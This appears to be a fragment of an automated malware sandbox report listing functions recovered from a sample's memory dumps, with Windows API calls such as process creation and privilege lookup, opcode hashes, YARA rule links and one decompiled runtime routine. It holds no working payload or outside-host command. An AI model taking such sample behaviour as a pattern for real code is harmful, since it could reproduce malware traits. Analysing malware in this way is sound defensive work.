                                                                              Function 001D82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D834A
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D836B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                              • Instruction ID: 531177a919d39e90d497b8083f969d013c143aa30438c82971878025ba4be55d
                                                                              • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                              • Instruction Fuzzy Hash: 6801D431A802287BE720A6959C43FBE762C6B10F50F040015FB04BA2C1E794690642E6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA0A4, Relevance: 1.6, APIs: 1, Instructions: 55processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
                                                                              • Instruction ID: 5471ec44897e25ccfdd19f36d27e9d7870d2e34a8ac4de98deefae2f4f51fc7a
                                                                              • Opcode Fuzzy Hash: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
                                                                              • Instruction Fuzzy Hash: E90117B2204549AFCB24DF99D880DEB77A9AF8C750F118259BA4CA7201D630E9158BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA0DF, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                                                              • Instruction ID: 49ecbb83c2634366653b5b2f113c87dcf7f7ea8c57973374289c242431527273
                                                                              • Opcode Fuzzy Hash: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                                                              • Instruction Fuzzy Hash: 89019DB2210108AFCB58CF99DC80EEB77A9AF8C754F158258BA0DA7251C630E851CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction ID: 133c46df1f26f8f46005787f325f46aaed268e13cf2f6ec48fb51e56ce4990ec
                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction Fuzzy Hash: 1501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(001E4506,?,001E4C7F,001E4C7F,?,001E4506,?,?,?,?,?,00000000,00000000,?), ref: 001EA05D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction ID: f50fde2cf8052fb39bc7f1884dc6aea61d48c8004a3a678b0595902ea7935c45
                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction Fuzzy Hash: 24E04FB1200208ABD714DF59CC41EA777ACEF88754F118558FE085B242C630F910CBF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001EA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1A2,001DF1A2,?,00000000,?,?), ref: 001EA200
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction ID: d81a491eb1b3b6a4c772da26f31ddf3c6805fb996a440d4f45e06667d631a59b
                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction Fuzzy Hash: CFE01AB1200208ABDB10DF49CC85EEB37ADEF88650F018154BA0867242CA30F8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001DF697, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,001D8CF4,?), ref: 001DF6CB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
                                                                              • Instruction ID: 12e31c6c42888344b18f18d82dadd9ed9d7029760ff3a569f7a9efa97fffec48
                                                                              • Opcode Fuzzy Hash: 85d636029a4ee010e8574ab06188646d0d364b4e7eab614e71f0a9dbb9c163cd
                                                                              • Instruction Fuzzy Hash: F5D095317503043BE600FEB5DC03F263ACDAB05B50F090074FA49D73C3DA14E1014069
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 001DF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,001D8CF4,?), ref: 001DF6CB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                              • Instruction ID: 8c7dd63932b0ade09caaa8c1de2c71b3689d0d296e8c59165e7089643f61a337
                                                                              • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                              • Instruction Fuzzy Hash: 7BD0A7717903043BE610FAA59C03F2632CD6B54B00F490074FA49D73C3DA54E5014165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0456967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6d73c311eeda015f373c7a376fe4d304e130c9ebe8ec511de2670b27aa01e7bc
                                                                              • Instruction ID: de25ea613d828535194a6d1b67f760c8a77a58d968e37df4fad9b04793068196
                                                                              • Opcode Fuzzy Hash: 6d73c311eeda015f373c7a376fe4d304e130c9ebe8ec511de2670b27aa01e7bc
                                                                              • Instruction Fuzzy Hash: D6B092B29425C5CAFB51EBA06B08B2B7E54BBD0745F26C062E2031781A4778E095F6B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 045BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E045BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0456CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E045B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E045B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                              0x045bfdda
                                                                              0x045bfde2
                                                                              0x045bfde5
                                                                              0x045bfdec
                                                                              0x045bfdfa
                                                                              0x045bfdff
                                                                              0x045bfe0a
                                                                              0x045bfe0f
                                                                              0x045bfe17
                                                                              0x045bfe1e
                                                                              0x045bfe19
                                                                              0x045bfe19
                                                                              0x045bfe19
                                                                              0x045bfe20
                                                                              0x045bfe21
                                                                              0x045bfe22
                                                                              0x045bfe25
                                                                              0x045bfe40

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045BFDFA
                                                                              Strings
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045BFE01
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045BFE2B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp Download File
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 9d88b68bb3a146432cf4c0ca003814c0fc96cbf2a96eeb0e8c7a6dcb9a543c44
                                                                              • Instruction ID: 6086c81a7fbca45b4731670231f2694c8b770e9866df2cd56d9300f7ec581ea9
                                                                              • Opcode Fuzzy Hash: 9d88b68bb3a146432cf4c0ca003814c0fc96cbf2a96eeb0e8c7a6dcb9a543c44
                                                                              • Instruction Fuzzy Hash: 4BF0C236200241BBE6251A45DC02E63BB6AFB85774F240214F668561E1EA62B830A6E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%